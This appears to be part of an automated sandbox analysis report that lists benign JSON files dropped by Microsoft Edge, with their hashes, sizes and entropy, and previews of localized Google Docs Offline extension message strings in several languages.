                                                                                                                                                                                                                                                                                                  SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                                  SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):848
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.494568170878587
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgg4eCBxNdN3vRyc1NzXW6iFrSCBxesJGceKCSUuvlvOgwCBhUufz1tnaXrQ:1HA3djfR3NzXviFrJj4sJXJ+bA6RM
                                                                                                                                                                                                                                                                                                  MD5:3734D498FB377CF5E4E2508B8131C0FA
                                                                                                                                                                                                                                                                                                  SHA1:AA23E39BFE526B5E3379DE04E00EACBA89C55ADE
                                                                                                                                                                                                                                                                                                  SHA-256:AB5CDA04013DCE0195E80AF714FBF3A67675283768FFD062CF3CF16EDB49F5D4
                                                                                                                                                                                                                                                                                                  SHA-512:56D9C792954214B0DE56558983F7EB7805AC330AF00E944E734340BE41C68E5DD03EDDB17A63BC2AB99BDD9BE1F2E2DA5BE8BA7C43D938A67151082A9041C7BA
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1425
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.461560329690825
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HA6Krbbds5Kna/BNzXviFrpsCxKU4irpNQ0+qWK5yOJAaCB7MAa6:BKrbBs5Kna/BNzXvi3sCxKZirA0jWK5m
                                                                                                                                                                                                                                                                                                  MD5:578215FBB8C12CB7E6CD73FBD16EC994
                                                                                                                                                                                                                                                                                                  SHA1:9471D71FA6D82CE1863B74E24237AD4FD9477187
                                                                                                                                                                                                                                                                                                  SHA-256:102B586B197EA7D6EDFEB874B97F95B05D229EA6A92780EA8544C4FF1E6BC5B1
                                                                                                                                                                                                                                                                                                  SHA-512:E698B1A6A6ED6963182F7D25AC12C6DE06C45D14499DDC91E81BDB35474E7EC9071CFEBD869B7D129CB2CD127BC1442C75E408E21EB8E5E6906A607A3982B212
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):961
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.537633413451255
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvggeCBxNFxcw2CVcfamedatqWCCBxeFxCF/m+rWAaFQbCSUuExqIQdO06stp:1HAqn0gcfa9dc/5mCpmIWck02USfWmk
                                                                                                                                                                                                                                                                                                  MD5:F61916A206AC0E971CDCB63B29E580E3
                                                                                                                                                                                                                                                                                                  SHA1:994B8C985DC1E161655D6E553146FB84D0030619
                                                                                                                                                                                                                                                                                                  SHA-256:2008F4FAAB71AB8C76A5D8811AD40102C380B6B929CE0BCE9C378A7CADFC05EB
                                                                                                                                                                                                                                                                                                  SHA-512:D9C63B2F99015355ACA04D74A27FD6B81170750C4B4BE7293390DC81EF4CD920EE9184B05C61DC8979B6C2783528949A4AE7180DBF460A2620DBB0D3FD7A05CF
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):959
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.570019855018913
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HARn05cfa9dcDmQOTtSprj0zaGUSjSGZ:+n0CfMcDmQOTQprj4qpC
                                                                                                                                                                                                                                                                                                  MD5:535331F8FB98894877811B14994FEA9D
                                                                                                                                                                                                                                                                                                  SHA1:42475E6AFB6A8AE41E2FC2B9949189EF9BBE09FB
                                                                                                                                                                                                                                                                                                  SHA-256:90A560FF82605DB7EDA26C90331650FF9E42C0B596CEDB79B23598DEC1B4988F
                                                                                                                                                                                                                                                                                                  SHA-512:2CE9C69E901AB5F766E6CFC1E592E1AF5A07AA78D154CCBB7898519A12E6B42A21C5052A86783ABE3E7A05043D4BD41B28960FEDDB30169FF7F7FE7208C8CFE9
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):968
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.633956349931516
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HA5WG6t306+9sihHvMfdJLjUk4NJPNczGr:mWGY0cOUdJODPmzs
                                                                                                                                                                                                                                                                                                  MD5:64204786E7A7C1ED9C241F1C59B81007
                                                                                                                                                                                                                                                                                                  SHA1:586528E87CD670249A44FB9C54B1796E40CDB794
                                                                                                                                                                                                                                                                                                  SHA-256:CC31B877238DA6C1D51D9A6155FDE565727A1956572F466C387B7E41C4923A29
                                                                                                                                                                                                                                                                                                  SHA-512:44FCF93F3FB10A3DB68D74F9453995995AB2D16863EC89779DB451A4D90F19743B8F51095EEC3ECEF5BD0C5C60D1BF3DFB0D64DF288DCCFBE70C129AE350B2C6
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):838
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.4975520913636595
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:YnmjggqTWngosqYQqE1kjO39m7OddC0vjWQMmWgqwgQ8KLcxOb:Ynmsgqyngosq9qxTOs0vjWQMbgqchb
                                                                                                                                                                                                                                                                                                  MD5:29A1DA4ACB4C9D04F080BB101E204E93
                                                                                                                                                                                                                                                                                                  SHA1:2D0E4587DDD4BAC1C90E79A88AF3BD2C140B53B1
                                                                                                                                                                                                                                                                                                  SHA-256:A41670D52423BA69C7A65E7E153E7B9994E8DD0370C584BDA0714BD61C49C578
                                                                                                                                                                                                                                                                                                  SHA-512:B7B7A5A0AA8F6724B0FA15D65F25286D9C66873F03080CBABA037BDEEA6AADC678AC4F083BC52C2DB01BEB1B41A755ED67BBDDB9C0FE4E35A004537A3F7FC458
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1305
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.673517697192589
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAX9yM7oiI99Rwx4xyQakJbfAEJhmq/RlBu92P7FbNcgYVJ0:JM7ovex4xyQaKjAEyq/p7taX0
                                                                                                                                                                                                                                                                                                  MD5:097F3BA8DE41A0AAF436C783DCFE7EF3
                                                                                                                                                                                                                                                                                                  SHA1:986B8CABD794E08C7AD41F0F35C93E4824AC84DF
                                                                                                                                                                                                                                                                                                  SHA-256:7C4C09D19AC4DA30CC0F7F521825F44C4DFBC19482A127FBFB2B74B3468F48F1
                                                                                                                                                                                                                                                                                                  SHA-512:8114EA7422E3B20AE3F08A3A64A6FFE1517A7579A3243919B8F789EB52C68D6F5A591F7B4D16CEE4BD337FF4DAF4057D81695732E5F7D9E761D04F859359FADB
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "..... ... ....".. },.. "explanationofflinedisabled": {.. "message": "...... ...... .... ....... .. ....... Google .... ..... ........ .... ... .. .. ....... ... ..... .. ....... .. .... .... ....... Google ..... . .......... ...... .. .... .....".. },.. "explanationofflineenabled": {.. "message": "...... ..... ... ...... ......... ......... .. .. .. ..... ..... ...... .... .. ........ ..... ..... .....".. },.. "extdesc": {.. "message": "...... ............ . ........ .. ....... ..... . ...... .... . ... ... ..... .... ...... .. ........".. },.. "extname": {.. "message": "....... Google .
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):911
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.6294343834070935
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvguCBxNMME2BESA7gPQk36xCBxeMMcXYBt+CSU1pfazCBhUunV1tLaX5GI2N:1HAVioESAsPf36O3Xst/p3J8JeEY
                                                                                                                                                                                                                                                                                                  MD5:B38CBD6C2C5BFAA6EE252D573A0B12A1
                                                                                                                                                                                                                                                                                                  SHA1:2E490D5A4942D2455C3E751F96BD9960F93C4B60
                                                                                                                                                                                                                                                                                                  SHA-256:2D752A5DBE80E34EA9A18C958B4C754F3BC10D63279484E4DF5880B8FD1894D2
                                                                                                                                                                                                                                                                                                  SHA-512:6E65207F4D8212736059CC802C6A7104E71A9CC0935E07BD13D17EC46EA26D10BC87AD923CD84D78781E4F93231A11CB9ED8D3558877B6B0D52C07CB005F1C0C
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):939
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.451724169062555
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAXbH2eZXn6sjLITdRSJpGL/gWFJ3sqixO:ubHfZqsHIT/FLL3qO
                                                                                                                                                                                                                                                                                                  MD5:FCEA43D62605860FFF41BE26BAD80169
                                                                                                                                                                                                                                                                                                  SHA1:F25C2CE893D65666CC46EA267E3D1AA080A25F5B
                                                                                                                                                                                                                                                                                                  SHA-256:F51EEB7AAF5F2103C1043D520E5A4DE0FA75E4DC375E23A2C2C4AFD4D9293A72
                                                                                                                                                                                                                                                                                                  SHA-512:F66F113A26E5BCF54B9AAFA69DAE3C02C9C59BD5B9A05F829C92AF208C06DC8CCC7A1875CBB7B7CE425899E4BA27BFE8CE2CDAF43A00A1B9F95149E855989EE0
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):977
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.622066056638277
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAdy42ArMdsH50Jd6Z1PCBolXAJ+GgNHp0X16M1J1:EyfArMS2Jd6Z1PCBolX2+vNmX16Y1
                                                                                                                                                                                                                                                                                                  MD5:A58C0EEBD5DC6BB5D91DAF923BD3A2AA
                                                                                                                                                                                                                                                                                                  SHA1:F169870EEED333363950D0BCD5A46D712231E2AE
                                                                                                                                                                                                                                                                                                  SHA-256:0518287950A8B010FFC8D52554EB82E5D93B6C3571823B7CECA898906C11ABCC
                                                                                                                                                                                                                                                                                                  SHA-512:B04AFD61DE490BC838354E8DC6C22BE5C7AC6E55386FFF78489031ACBE2DBF1EAA2652366F7A1E62CE87CFCCB75576DA3B2645FEA1645B0ECEB38B1FA3A409E8
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):972
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.621319511196614
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAdyg2pwbv1V8Cd61PC/vT2fg3YHDyM1J1:EyHpwbpd61C/72Y3YOY1
                                                                                                                                                                                                                                                                                                  MD5:6CAC04BDCC09034981B4AB567B00C296
                                                                                                                                                                                                                                                                                                  SHA1:84F4D0E89E30ED7B7ACD7644E4867FFDB346D2A5
                                                                                                                                                                                                                                                                                                  SHA-256:4CAA46656ECC46A420AA98D3307731E84F5AC1A89111D2E808A228C436D83834
                                                                                                                                                                                                                                                                                                  SHA-512:160590B6EC3DCF48F3EA7A5BAA11A8F6FA4131059469623E00AD273606B468B3A6E56D199E97DAA0ECB6C526260EBAE008570223F2822811F441D1C900DC33D6
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):990
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.497202347098541
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvggECBxNbWVqMjlMgaPLqXPhTth0CBxebWbMRCSUCjAKFCSIj0tR7tCBhP1l:1HACzWsMlajIhJhHKWbFKFC0tR8oNK5
                                                                                                                                                                                                                                                                                                  MD5:6BAAFEE2F718BEFBC7CD58A04CCC6C92
                                                                                                                                                                                                                                                                                                  SHA1:CE0BDDDA2FA1F0AD222B604C13FF116CBB6D02CF
                                                                                                                                                                                                                                                                                                  SHA-256:0CF098DFE5BBB46FC0132B3CF0C54B06B4D2C8390D847EE2A65D20F9B7480F4C
                                                                                                                                                                                                                                                                                                  SHA-512:3DA23E74CD6CF9C0E2A0C4DBA60301281D362FB0A2A908F39A55ABDCA4CC69AD55638C63CC3BEFD44DC032F9CBB9E2FDC1B4C4ABE292917DF8272BA25B82AF20
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1658
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.294833932445159
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HA3k3FzEVeXWuvLujNzAK11RiqRC2sA0O3cEiZ7dPRFFOPtZdK0A41yG3BczKT3:Q4pE4rCjNjw6/0y+5j8ZHA4PBSKr
                                                                                                                                                                                                                                                                                                  MD5:BC7E1D09028B085B74CB4E04D8A90814
                                                                                                                                                                                                                                                                                                  SHA1:E28B2919F000B41B41209E56B7BF3A4448456CFE
                                                                                                                                                                                                                                                                                                  SHA-256:FE8218DF25DB54E633927C4A1640B1A41B8E6CB3360FA386B5382F833B0B237C
                                                                                                                                                                                                                                                                                                  SHA-512:040A8267D67DB05BBAA52F1FAC3460F58D35C5B73AA76BBF17FA78ACC6D3BFB796A870DD44638F9AC3967E35217578A20D6F0B975CEEEEDBADFC9F65BE7E72C9
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".... .....".. },.. "explanationofflinedisabled": {.. "message": "... ...... ... ........ ....... ... Google .......... ..... .... ...., ... .... .... ...... ........ .... ...... ... ...... Google ........ ...... .. ........ .. ... ... ...... ....... .... ....".. },.. "explanationofflineenabled": {.. "message": "... ...... .., ..... ... ... .. ...... ..... ....... ... ... .. .... ... ..... ... ...".. },.. "extdesc": {.. "message": "..... ........., ..
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1672
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.314484457325167
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:46G2+ymELbLNzGVx/hXdDtxSRhqv7Qm6/7Lm:4GbxzGVzXdDtx+qzU/7C
                                                                                                                                                                                                                                                                                                  MD5:98A7FC3E2E05AFFFC1CFE4A029F47476
                                                                                                                                                                                                                                                                                                  SHA1:A17E077D6E6BA1D8A90C1F3FAF25D37B0FF5A6AD
                                                                                                                                                                                                                                                                                                  SHA-256:D2D1AFA224CDA388FF1DC8FAC24CDA228D7CE09DE5D375947D7207FA4A6C4F8D
                                                                                                                                                                                                                                                                                                  SHA-512:457E295C760ABFD29FC6BBBB7FC7D4959287BCA7FB0E3E99EB834087D17EED331DEF18138838D35C48C6DDC8A0134AFFFF1A5A24033F9B5607B355D3D48FDF88
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):935
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.6369398601609735
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HA7sR5k/I+UX/hrcySxG1fIZ3tp/S/d6Gpb+D:YsE/I+UX/hVSxQ03f/Sj+D
                                                                                                                                                                                                                                                                                                  MD5:25CDFF9D60C5FC4740A48EF9804BF5C7
                                                                                                                                                                                                                                                                                                  SHA1:4FADECC52FB43AEC084DF9FF86D2D465FBEBCDC0
                                                                                                                                                                                                                                                                                                  SHA-256:73E6E246CEEAB9875625CD4889FBF931F93B7B9DEAA11288AE1A0F8A6E311E76
                                                                                                                                                                                                                                                                                                  SHA-512:EF00B08496427FEB5A6B9FB3FE2E5404525BE7C329D9DD2A417480637FD91885837D134A26980DCF9F61E463E6CB68F09A24402805807E656AF16B116A75E02C
                                                                                                                                                                                                                                                                                                  Malicious:false
